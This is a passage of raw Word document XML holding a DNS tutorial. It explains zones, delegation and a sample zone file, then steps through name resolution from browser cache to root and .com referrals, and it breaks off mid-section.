    <w:p w14:paraId="3EC4B9F1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Labels and Zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E3921" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Label:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Each dot-separated component (www, google, com) is a label. Labels are case-insensitive, max 63 characters each. Total FQDN max length: 253 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E827404" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Zone:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zone</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> is a contiguous portion of the namespace that a single administrative entity controls. google.com is a zone managed by Google. com is a zone managed by Verisign. The root (.) is a zone managed by IANA/ICANN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA98CCC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone delegation:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> When the com zone wants to hand off authority for google.com to Google's nameservers, it adds </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NS records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (Name Server records) pointing to Google's authoritative nameservers. This is delegation — the com zone no longer answers questions about google.com; it redirects to Google's servers. This is the mechanism that makes DNS infinitely scalable — </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no single entity manages the whole tree</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B7C05" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone file:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> An authoritative nameserver stores its zone data in a zone file — a text file containing resource records (RRs). The structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E21CD38" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAAB7F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>$ORIGIN google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4721EBEC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>$TTL 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B648CD4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4"/>
    <w:p w14:paraId="5B7BA7E3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>@        IN  SOA   ns1.google.com. dns-admin.google.com. (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E48782" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                   2024052801  ; serial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F4A1D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                   900         ; refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B03BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                   900         ; retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B5541" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                   1800        ; expire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D29885" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                   60 )        ; minimum TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A321476" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4"/>
    <w:p w14:paraId="2E47CD28" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>@        IN  NS    ns1.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13964CA7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>@        IN  NS    ns2.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08076356" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>@        IN  A     142.250.80.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A845B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>www      IN  A     142.250.80.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D344DAE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>mail     IN  MX    10 smtp.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94F603" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="4AFED564">
          <v:rect id="_x0000_i3169" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE96D8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The DNS Resolution Process — Every Step Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DDE0CA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>When you type www.github.com in a browser, here is </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exactly</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> what happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46059D31" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Browser Cache Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C4BA6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The browser maintains its own DNS cache (separate from the OS). Chrome, Firefox, Safari all cache DNS responses for the duration of the TTL. Chrome has a DNS cache viewer at chrome://net-internals/#dns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EF9E5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If the browser cache has a valid (non-expired) entry → </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>done, no network I/O at all</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE590D2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — OS Resolver Cache Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F19ED5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If the browser cache misses, the browser calls the OS's resolver library (getaddrinfo() on Linux/Mac, DnsQuery() on Windows). The OS maintains its own DNS cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B67235A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> nscd (Name Service Cache Daemon) or systemd-resolved maintains the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC40298" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>macOS:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> mDNSResponder process manages DNS caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A46552" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> DNS Client service (Dnscache) maintains the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCFEE67" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The OS also checks /etc/hosts (Linux/Mac) or C:\Windows\System32\drivers\etc\hosts (Windows) </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> making any network query. This file is checked first — it's how ad blockers and development overrides work (mapping domains to 127.0.0.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9C9AC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If OS cache or hosts file has an answer → </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BAA6AC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Query to Recursive Resolver (The Heavy Lifter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7498F07E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If no cache hit, the OS sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recursive DNS query</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> to a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recursive resolver</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (also called a recursive nameserver or DNS resolver). This is configured in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F1413" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>/etc/resolv.conf on Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1F1F2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Network adapter settings on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496BB0F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>DHCP-assigned (your router typically provides its IP as the DNS server, which forwards to your ISP's resolver or a configured public resolver like 8.8.8.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371150D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common recursive resolvers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64417055" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>8.8.8.8 / 8.8.4.4 — Google Public DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F5A33" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>1.1.1.1 / 1.0.0.1 — Cloudflare DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B430E4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>9.9.9.9 — Quad9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C476EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>The query is sent as a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP packet</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> to port 53 of the recursive resolver. The query contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12D1EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The domain name being queried: www.github.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390BCEDB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The query type: A (IPv4 address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B8107" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RD flag (Recursion Desired)</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> set to 1 — telling the resolver "do the full resolution for me"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7561985F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4 — The Recursive Resolver Does the Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F6282" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The recursive resolver is where the real magic happens. If it doesn't have www.github.com in its cache, it </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iteratively</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> resolves the name by walking the DNS tree from root to leaf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B12E195" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4a — Query the Root Nameservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64C820" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The recursive resolver has a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hardcoded list of root nameserver IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> called the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root hints file</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (or named.root). There are </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13 root nameserver identities</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (named A through M: a.root-servers.net through m.root-servers.net), but each of these identities is actually </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hundreds of physical servers worldwide</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> behind Anycast IPs. The number 13 is not a fundamental limit — it's a constraint from the original DNS design where all 13 IPs had to fit in a single 512-byte UDP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E59E7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The resolver sends a query to one of the root nameservers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABCA70" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3281E429" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Query: "Who is authoritative for www.github.com type A?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1AB896" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Root nameserver response (</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>referral</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>, not an answer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6828151A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE72A4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>I don't know www.github.com, but the .com zone is handled by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940E281" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>ns1.verisign.com (192.5.6.30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E6267" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>ns2.verisign.com (192.5.6.31)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7951E6DA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[+ 11 more com. nameservers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56122671" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>This response contains </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NS records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for com. plus </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>glue records</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — A records for the nameservers themselves. Glue records are essential: if you're looking up the IP for ns1.verisign.com and that server is in the com. zone, you'd have a chicken-and-egg problem. Glue records break the circular dependency by including the nameserver's IP directly in the referral response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11599099" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4b — Query the TLD Nameservers (.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340D055D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The resolver now queries Verisign's .com TLD nameservers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72939B12" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0FD06" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Query: "Who is authoritative for www.github.com type A?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E78FD7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>.com TLD nameserver response (referral):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698621F1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
